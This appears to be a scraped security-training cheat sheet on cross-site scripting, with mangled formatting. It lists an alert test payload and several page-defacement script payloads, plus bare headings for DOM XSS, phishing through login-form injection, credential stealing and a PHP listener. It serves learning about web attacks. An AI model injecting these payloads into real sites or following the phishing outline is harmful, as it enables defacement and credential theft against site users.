โ๏ธXSS
XSS Testing Payloads
<script>alert(window.origin)</script>Stored XSS
Defacing Elements
<script>document.body.style.background = "#141d2b"</script><script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script><script>document.title = 'HackTheBox Academy'</script>document.getElementById("todo").innerHTML = "New Text"$("#todo").html('New Text');Source & Sink
JavaScript functions
jQuery library functions
DOM XSS
XSS Strike
Phishing
Login Form Injection
Credentials Stealing
PHP Listener
Last updated